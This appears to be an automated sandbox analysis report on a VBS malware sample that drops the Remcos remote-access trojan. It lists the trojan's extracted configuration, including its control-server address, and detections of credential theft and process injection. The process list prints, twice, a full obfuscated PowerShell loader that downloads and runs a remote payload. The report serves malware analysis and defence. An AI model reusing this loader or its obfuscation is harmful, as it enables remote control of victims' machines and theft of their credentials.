Analysis
-
max time kernel
149s -
max time network
149s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
11-10-2024 02:03
Static task
static1
Behavioral task
behavioral1
Sample
165cb6e17955b9dbc743f800788545b61e296119b10d22efea0cfb2f1ceb4ed5.vbs
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
165cb6e17955b9dbc743f800788545b61e296119b10d22efea0cfb2f1ceb4ed5.vbs
Resource
win10v2004-20241007-en
General
-
Target
165cb6e17955b9dbc743f800788545b61e296119b10d22efea0cfb2f1ceb4ed5.vbs
-
Size
18KB
-
MD5
35c0401fa3a0988df57e978eaa661dd2
-
SHA1
a07a742be842b55f4218d8c9f6f2287c21baf2db
-
SHA256
165cb6e17955b9dbc743f800788545b61e296119b10d22efea0cfb2f1ceb4ed5
-
SHA512
3aaf8a7bdf2da627c05065cc4e999015adc968f111da32fb0e6c2fe80e73553b3f125964796790f8257cd0dfc6468cd939b18e47fb8b3f468bd2625579246371
-
SSDEEP
384:245uPIaVI9kYnUqIsLcZ/j5SL5u9InBOqJckjVMQZKWZrqLwA0:WPIaVI95U57Z9SgqBOxkRhrb
Malware Config
Extracted
remcos
RemoteHost
154.216.17.14:2404
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-KC5V8F
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Detected Nirsoft tools 3 IoCs
Free utilities often used by attackers which can steal passwords, product keys, etc.
resource yara_rule behavioral1/memory/3048-29-0x0000000000400000-0x0000000000478000-memory.dmp Nirsoft behavioral1/memory/2864-41-0x0000000000400000-0x0000000000424000-memory.dmp Nirsoft behavioral1/memory/3060-40-0x0000000000400000-0x0000000000462000-memory.dmp Nirsoft -
NirSoft MailPassView 1 IoCs
Password recovery tool for various email clients
resource yara_rule behavioral1/memory/3060-40-0x0000000000400000-0x0000000000462000-memory.dmp MailPassView -
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers
resource yara_rule behavioral1/memory/3048-29-0x0000000000400000-0x0000000000478000-memory.dmp WebBrowserPassView -
Blocklisted process makes network request 5 IoCs
flow pid Process 5 2744 powershell.exe 7 1232 msiexec.exe 8 1232 msiexec.exe 10 1232 msiexec.exe 11 1232 msiexec.exe -
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts msiexec.exe -
pid Process 2744 powershell.exe 588 powershell.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 1232 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 588 powershell.exe 1232 msiexec.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 1232 set thread context of 3048 1232 msiexec.exe 38 PID 1232 set thread context of 3060 1232 msiexec.exe 39 PID 1232 set thread context of 2864 1232 msiexec.exe 40 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 2744 powershell.exe 588 powershell.exe 588 powershell.exe 3048 msiexec.exe 3048 msiexec.exe -
Suspicious behavior: MapViewOfSection 4 IoCs
pid Process 588 powershell.exe 1232 msiexec.exe 1232 msiexec.exe 1232 msiexec.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 2744 powershell.exe Token: SeDebugPrivilege 588 powershell.exe Token: SeDebugPrivilege 2864 msiexec.exe -
Suspicious use of WriteProcessMemory 35 IoCs
description pid Process procid_target PID 2792 wrote to memory of 2744 2792 WScript.exe 31 PID 2792 wrote to memory of 2744 2792 WScript.exe 31 PID 2792 wrote to memory of 2744 2792 WScript.exe 31 PID 588 wrote to memory of 1232 588 powershell.exe 35 PID 588 wrote to memory of 1232 588 powershell.exe 35 PID 588 wrote to memory of 1232 588 powershell.exe 35 PID 588 wrote to memory of 1232 588 powershell.exe 35 PID 588 wrote to memory of 1232 588 powershell.exe 35 PID 588 wrote to memory of 1232 588 powershell.exe 35 PID 588 wrote to memory of 1232 588 powershell.exe 35 PID 588 wrote to memory of 1232 588 powershell.exe 35 PID 1232 wrote to memory of 3048 1232 msiexec.exe 38 PID 1232 wrote to memory of 3048 1232 msiexec.exe 38 PID 1232 wrote to memory of 3048 1232 msiexec.exe 38 PID 1232 wrote to memory of 3048 1232 msiexec.exe 38 PID 1232 wrote to memory of 3048 1232 msiexec.exe 38 PID 1232 wrote to memory of 3048 1232 msiexec.exe 38 PID 1232 wrote to memory of 3048 1232 msiexec.exe 38 PID 1232 wrote to memory of 3048 1232 msiexec.exe 38 PID 1232 wrote to memory of 3060 1232 msiexec.exe 39 PID 1232 wrote to memory of 3060 1232 msiexec.exe 39 PID 1232 wrote to memory of 3060 1232 msiexec.exe 39 PID 1232 wrote to memory of 3060 1232 msiexec.exe 39 PID 1232 wrote to memory of 3060 1232 msiexec.exe 39 PID 1232 wrote to memory of 3060 1232 msiexec.exe 39 PID 1232 wrote to memory of 3060 1232 msiexec.exe 39 PID 1232 wrote to memory of 3060 1232 msiexec.exe 39 PID 1232 wrote to memory of 2864 1232 msiexec.exe 40 PID 1232 wrote to memory of 2864 1232 msiexec.exe 40 PID 1232 wrote to memory of 2864 1232 msiexec.exe 40 PID 1232 wrote to memory of 2864 1232 msiexec.exe 40 PID 1232 wrote to memory of 2864 1232 msiexec.exe 40 PID 1232 wrote to memory of 2864 1232 msiexec.exe 40 PID 1232 wrote to memory of 2864 1232 msiexec.exe 40 PID 1232 wrote to memory of 2864 1232 msiexec.exe 40
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\165cb6e17955b9dbc743f800788545b61e296119b10d22efea0cfb2f1ceb4ed5.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:2792 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Gearstngers Checkoffs Unappealingly spectatress Asynkron Proglottis #>;$Romancy='Greyfly';<#Israelitter Dikotomien Pavens Dokumentbehandlings Xenophobia Nel #>;$Glossocomium44=$Velstandsstigning+$host.UI;If ($Glossocomium44) {$Kautioneringernes++;}function Perspicable($React){$Yecchs=$stactes+$React.'Length'-$Kautioneringernes; for( $Mglingernes=3;$Mglingernes -lt $Yecchs;$Mglingernes+=4){$Kordninger='Romancens';$Tudehovedets+=$React[$Mglingernes];$Tusindfryds='stenrkners';}$Tudehovedets;}function Unmudded($Listevalget){ & ($Bikarbonaters) ($Listevalget);}$Fagomraadernes=Perspicable ' I MFrsof.rzDiai splTollnedas r/Lgn5Bla.Wee0Dmo Win(NysWUnciAfhnl ad U oUnswOvese,u C N D TCey ste1Dem0Par.For0.ry; as aaW,luiTr.nJ,n6Hum4Cri;Pla skaxOpe6Gyr4s m;Per UrirUgevDiv:Er.1Hys2bet1slu.Hal0For)F,r re GForeVi.c s.kFagoKon/Emp2Gar0 No1s m0Aut0Co 1Ph,0 Ud1,po NiF HoiAzorspkesalfT doAgrxTis/Fre1Fej2gas1U,f.Amb0 u ';$Novelisers=Perspicable ' quuFiss P.EFedr ,v-T.oABnfg E e ensp T B. ';$stigma=Perspicable 'R,th V t yptstepFla:Vol/ i/A.gl tunFo 6sexb a9 Ga. Ens nhsouoR spDam/ dsIsndB Roo eld reHGlyWBreP FewHow/ scKNomo svkNokkDraeBesrObteAb r ChiEndnU sg Ar.stioCh.c Inx ev ';$Milieuers=Perspicable 'b r>Ben ';$Bikarbonaters=Perspicable ' asiKivE uXCh, ';$Paraffineredes='implicity';$stofmisbrugs='\Lokumernes.sus';Unmudded (Perspicable 'Usi$ flgEm L Reo Vab slA OmL Ha: CaFstuO opR erdIcom A Tjou= Ls$wheeVe,NPotv et:MonaFysPElsPA pdAi ATreTIntA,ro+ co$Laks rTVacOsenF orM raI DessveBEntrsakUPu gEubsBoh ');Unmudded (Perspicable 'Pol$ ftgManl tro unBsamAIntLPej: MtT whuD,mAT xr o EPargAre=bac$ .asAdrtArviIncg D,M naaGav.Tils LaPBetLBe.IPo T Tr(Unp$ColMagaisagLP eIskoELanuUndE.roRRe,sKon)Pla ');Unmudded (Perspicable 'Hel[smanAtteTritA k.DefsAnoe.lorKr v niiMa,C suE,krPferOsliiR,mNtr t agM efA vnNforAAn G .yEImpRW m]Kal:pri: KasF reMe cs,ruBalrsmaINobtH eystrP stRRenoBr.t B o sac.mao roLCh c o=Vib sov[ PiNUnbesnvtLet.Cars FoETryCRekU HeRstai TitTidY FlPCurRN.do Vat .eoLincResO silsent euyDepPMa e Pa]Ind: En:L,sTHealR,fs.el1 sl2sen ');$stigma=$Tuareg[0];$Lithol31=(Perspicable ' Ac$ krGPreLP eOKvaB omA all.no:s emAntoBipNG.oo TrNBaloslaM suiTndAP rNEje= TrnDy eU eWTil-PumOBunbsikJUdteOpecBopT,es sydsTynyF,ssHaltOuteM lmFev.M cn,hoeArmT sa. stWtoreIndB soCTirlYo i U eRanN HyT nt ');Unmudded ($Lithol31);Unmudded (Perspicable 'Tid$UnuM Kaopronpudo ven.imoEf mKoriBa a omnUly.sp,HGaleOpeaAdodoveeVi rskisUn.[Ven$C lNHohoExovAudeRu.lsaviJous MaeGngr DisGen] ef=Mi.$ roF sna.erg iso Trm str staO gaTurdIngeFilrFi nVane Grs,at ');$sabotren=Perspicable '.es$ stMBreo ManVenoCavnTe oTram spisknaE,dnMat.plaD Prot rwfrunUndls toInsaBihd NiFPr iFall KaeAva(hov$Kl s letBomiJatg somDekaspa,Gle$ RrLparyIntn eil amaValaIn sFore minM ssTys)sko ';$Lynlaasens=$Fordmt;Unmudded (Perspicable ' i$RudG eLNitO U,bstoA Pilsu,:s aU huFFa,oPamrpa.sKbsoslinCiflstiiPsyG GnsPieTH le sk=Eja(MastT,aeVensKubTTra- E,pXerA ort fdH mo F $WallIndy UnnsyrlVacaMilaHaesCe EFranB lsBen)sam ');while (!$Uforsonligste) {Unmudded (Perspicable ' Je$AnngMicl rao T.bNonaOmol ni:DavVFraiAr nR toansss aiFjetM kiNeme dksFno=I.t$Portplorsynu,rie la ') ;Unmudded $sabotren;Unmudded (Perspicable 'Zo sTusT reaPenRDertsp,-BorsCanl .aEU sEUnlp eg Tpp4H.l ');Unmudded (Perspicable ' e$NicgTunLUnioIntbsinaBruLCar:Oveu,ivf oOak r nfsFixosulNUnslsquiUplg ilsartt ubesal=A.d(DemtTheeHaes.unTRek- efp AraTr,tRegH Mu Per$ UvlBaryobsNTinLH.sa bla Ops UdeConNTols so) s ') ;Unmudded (Perspicable 'Lys$Ko,gA,bL ftO M BspiA ZoLEll: ToFMoroin rHjeKF glGlae taLBensOl.Es eRbo =Phy$,ntgUnsLHoooUnhbPunAW tLsa :Ac G muyIneg onI DesUdp+men+Bar% ek$Mu tForUFliAErgR ute.rugFjl.E lC teoCajUFjaNHe ts i ') ;$stigma=$Tuareg[$Forklelser];}$Flukily135=317872;$Dekodere=28798;Unmudded (Perspicable 'Var$ForGFrdlPhoOKonB slABall on: .lw.elAAchUCatKPerit ttsko Rau=Ext HinGCusEPretT.o-BovCUpsONumnTretPerE aan NeT Tr En$soulOpgy.arN Brl LaA evaKass,emEswinpapsBar ');Unmudded (Perspicable ' o$ R gAt l osoBrobKriaA rlskv:Obes L msaxe glschtBipe D oscas,sotshaeAlb Bre=smu Oms[ kksgenyAr s HetDraebe mDeg.sjaCEf,oBesnP.avAn e,ibr NetMrk]War: Li:IntFAttrDeloDvrmM,sB G a f.s KoePho6 or4radsHydtMisrPsyiOven afglit(udr$s iWPe aT,euBarkWoriUnctGon)Ita ');Unmudded (Perspicable 'kl $Bjrg.rhl BooUkrBD.va,aalPor:A,bBJakOR.ngd isUbeaHonmH nlBe eForRKomePen4Pre2Bie Reo=Rus M k[KursafnyLeas xttsepELinMDy .m.sTKame axE utCha. NoEsupN s,cDiso.ntDli,ITuanOscgBru]Ung: Bi:K ias isCracpu.IsmyIFoy.Im G lEs,gtPossshrttetRTrdi.liNM.lgTys(Fid$MorsFormL eEk nLOl TOldEBygosyns PeT arETon)B.n ');Unmudded (Perspicable 'Oen$Fidg MelOd Osymb itaBetl ak:Ta,dThlI onsEtcsWooiUltmBygI oL iEAderHinEMyoneffdTilE Fo=sun$ riBCh,o Amgs,asOveAAbsm AnlcarEsieRPyreLoe4Pan2Rio. prssymUBlobGresVe TMy rRekI un svg Ca( sv$.emFM llDaguBnkK uziGrnLst Y d 1Gen3 st5 yr, an$ ndDP.we D,k apo spD .oeIchRK je Bu)he ');Unmudded $dissimilerende;"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2744
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Gearstngers Checkoffs Unappealingly spectatress Asynkron Proglottis #>;$Romancy='Greyfly';<#Israelitter Dikotomien Pavens Dokumentbehandlings Xenophobia Nel #>;$Glossocomium44=$Velstandsstigning+$host.UI;If ($Glossocomium44) {$Kautioneringernes++;}function Perspicable($React){$Yecchs=$stactes+$React.'Length'-$Kautioneringernes; for( $Mglingernes=3;$Mglingernes -lt $Yecchs;$Mglingernes+=4){$Kordninger='Romancens';$Tudehovedets+=$React[$Mglingernes];$Tusindfryds='stenrkners';}$Tudehovedets;}function Unmudded($Listevalget){ & ($Bikarbonaters) ($Listevalget);}$Fagomraadernes=Perspicable ' I MFrsof.rzDiai splTollnedas r/Lgn5Bla.Wee0Dmo Win(NysWUnciAfhnl ad U oUnswOvese,u C N D TCey ste1Dem0Par.For0.ry; as aaW,luiTr.nJ,n6Hum4Cri;Pla skaxOpe6Gyr4s m;Per UrirUgevDiv:Er.1Hys2bet1slu.Hal0For)F,r re GForeVi.c s.kFagoKon/Emp2Gar0 No1s m0Aut0Co 1Ph,0 Ud1,po NiF HoiAzorspkesalfT doAgrxTis/Fre1Fej2gas1U,f.Amb0 u ';$Novelisers=Perspicable ' quuFiss P.EFedr ,v-T.oABnfg E e ensp T B. ';$stigma=Perspicable 'R,th V t yptstepFla:Vol/ i/A.gl tunFo 6sexb a9 Ga. Ens nhsouoR spDam/ dsIsndB Roo eld reHGlyWBreP FewHow/ scKNomo svkNokkDraeBesrObteAb r ChiEndnU sg Ar.stioCh.c Inx ev ';$Milieuers=Perspicable 'b r>Ben ';$Bikarbonaters=Perspicable ' asiKivE uXCh, ';$Paraffineredes='implicity';$stofmisbrugs='\Lokumernes.sus';Unmudded (Perspicable 'Usi$ flgEm L Reo Vab slA OmL Ha: CaFstuO opR erdIcom A Tjou= Ls$wheeVe,NPotv et:MonaFysPElsPA pdAi ATreTIntA,ro+ co$Laks rTVacOsenF orM raI DessveBEntrsakUPu gEubsBoh ');Unmudded (Perspicable 'Pol$ ftgManl tro unBsamAIntLPej: MtT whuD,mAT xr o EPargAre=bac$ .asAdrtArviIncg D,M naaGav.Tils LaPBetLBe.IPo T Tr(Unp$ColMagaisagLP eIskoELanuUndE.roRRe,sKon)Pla ');Unmudded (Perspicable 'Hel[smanAtteTritA k.DefsAnoe.lorKr v niiMa,C suE,krPferOsliiR,mNtr t agM efA vnNforAAn G .yEImpRW m]Kal:pri: KasF reMe cs,ruBalrsmaINobtH eystrP stRRenoBr.t B o sac.mao roLCh c o=Vib sov[ PiNUnbesnvtLet.Cars FoETryCRekU HeRstai TitTidY FlPCurRN.do Vat .eoLincResO silsent euyDepPMa e Pa]Ind: En:L,sTHealR,fs.el1 sl2sen ');$stigma=$Tuareg[0];$Lithol31=(Perspicable ' Ac$ krGPreLP eOKvaB omA all.no:s emAntoBipNG.oo TrNBaloslaM suiTndAP rNEje= TrnDy eU eWTil-PumOBunbsikJUdteOpecBopT,es sydsTynyF,ssHaltOuteM lmFev.M cn,hoeArmT sa. stWtoreIndB soCTirlYo i U eRanN HyT nt ');Unmudded ($Lithol31);Unmudded (Perspicable 'Tid$UnuM Kaopronpudo ven.imoEf mKoriBa a omnUly.sp,HGaleOpeaAdodoveeVi rskisUn.[Ven$C lNHohoExovAudeRu.lsaviJous MaeGngr DisGen] ef=Mi.$ roF sna.erg iso Trm str staO gaTurdIngeFilrFi nVane Grs,at ');$sabotren=Perspicable '.es$ stMBreo ManVenoCavnTe oTram spisknaE,dnMat.plaD Prot rwfrunUndls toInsaBihd NiFPr iFall KaeAva(hov$Kl s letBomiJatg somDekaspa,Gle$ RrLparyIntn eil amaValaIn sFore minM ssTys)sko ';$Lynlaasens=$Fordmt;Unmudded (Perspicable ' i$RudG eLNitO U,bstoA Pilsu,:s aU huFFa,oPamrpa.sKbsoslinCiflstiiPsyG GnsPieTH le sk=Eja(MastT,aeVensKubTTra- E,pXerA ort fdH mo F $WallIndy UnnsyrlVacaMilaHaesCe EFranB lsBen)sam ');while (!$Uforsonligste) {Unmudded (Perspicable ' Je$AnngMicl rao T.bNonaOmol ni:DavVFraiAr nR toansss aiFjetM kiNeme dksFno=I.t$Portplorsynu,rie la ') ;Unmudded $sabotren;Unmudded (Perspicable 'Zo sTusT reaPenRDertsp,-BorsCanl .aEU sEUnlp eg Tpp4H.l ');Unmudded (Perspicable ' e$NicgTunLUnioIntbsinaBruLCar:Oveu,ivf oOak r nfsFixosulNUnslsquiUplg ilsartt ubesal=A.d(DemtTheeHaes.unTRek- efp AraTr,tRegH Mu Per$ UvlBaryobsNTinLH.sa bla Ops UdeConNTols so) s ') ;Unmudded (Perspicable 'Lys$Ko,gA,bL ftO M BspiA ZoLEll: ToFMoroin rHjeKF glGlae taLBensOl.Es eRbo =Phy$,ntgUnsLHoooUnhbPunAW tLsa :Ac G muyIneg onI DesUdp+men+Bar% ek$Mu tForUFliAErgR ute.rugFjl.E lC teoCajUFjaNHe ts i ') ;$stigma=$Tuareg[$Forklelser];}$Flukily135=317872;$Dekodere=28798;Unmudded (Perspicable 'Var$ForGFrdlPhoOKonB slABall on: .lw.elAAchUCatKPerit ttsko Rau=Ext HinGCusEPretT.o-BovCUpsONumnTretPerE aan NeT Tr En$soulOpgy.arN Brl LaA evaKass,emEswinpapsBar ');Unmudded (Perspicable ' o$ R gAt l osoBrobKriaA rlskv:Obes L msaxe glschtBipe D oscas,sotshaeAlb Bre=smu Oms[ kksgenyAr s HetDraebe mDeg.sjaCEf,oBesnP.avAn e,ibr NetMrk]War: Li:IntFAttrDeloDvrmM,sB G a f.s KoePho6 or4radsHydtMisrPsyiOven afglit(udr$s iWPe aT,euBarkWoriUnctGon)Ita ');Unmudded (Perspicable 'kl $Bjrg.rhl BooUkrBD.va,aalPor:A,bBJakOR.ngd isUbeaHonmH nlBe eForRKomePen4Pre2Bie Reo=Rus M k[KursafnyLeas xttsepELinMDy .m.sTKame axE utCha. NoEsupN s,cDiso.ntDli,ITuanOscgBru]Ung: Bi:K ias isCracpu.IsmyIFoy.Im G lEs,gtPossshrttetRTrdi.liNM.lgTys(Fid$MorsFormL eEk nLOl TOldEBygosyns PeT arETon)B.n ');Unmudded (Perspicable 'Oen$Fidg MelOd Osymb itaBetl ak:Ta,dThlI onsEtcsWooiUltmBygI oL iEAderHinEMyoneffdTilE Fo=sun$ riBCh,o Amgs,asOveAAbsm AnlcarEsieRPyreLoe4Pan2Rio. prssymUBlobGresVe TMy rRekI un svg Ca( sv$.emFM llDaguBnkK uziGrnLst Y d 1Gen3 st5 yr, an$ ndDP.we D,k apo spD .oeIchRK je Bu)he ');Unmudded $dissimilerende;"1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:588 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"2⤵
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:1232 -
C:\Windows\SysWOW64\msiexec.exeC:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\rhunnzfdcjqfairhomxhzhwweqvlhf"3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3048
-
-
C:\Windows\SysWOW64\msiexec.exeC:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\bjaxosqeyrikdonlxxjicuiemwmmiqsfbo"3⤵
- Accesses Microsoft Outlook accounts
- System Location Discovery: System Language Discovery
PID:3060
-
-
C:\Windows\SysWOW64\msiexec.exeC:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\mefqpk"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2864
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2B
MD5f3b25701fe362ec84616a93a45ce9998
SHA1d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA51298c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84
-
Filesize
451KB
MD5d416b489676a7a0e99127a093381013c
SHA1789c52ecdb35e346a91690e0b4ece4171377f864
SHA256aa4bf18faab69470759a7048c14e5eaa8329087e4035d84ddcc97bbb9c1ee6b1
SHA512fef21b0bb558390479d908b6295d85bdfd878e6d24e5f85935159b8a20deba0b35cd36a46416f93e8cdc9bb78d1e0091e65d8c2b135d91a80b72892805eb0f4c
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZD2OJ6RKNZENELYRME6N.temp
Filesize7KB
MD52b216244257300597303c51ea93224b6
SHA1fbde18041c5157156a3b84432f20d6815ecc7e1a
SHA256e0ac93ddaeec27bd8265f690244c8c1c5c61764fc90907db55cc22e1c30c7878
SHA5121ee3b419c37b2ab4b7612fe4ea3e07269a9dfeb55639f3c3f3a9abe8530ca311567f798c000c09945bf9d75b3bec67ccb6785d9e8ee37600d8ab2fa643b71349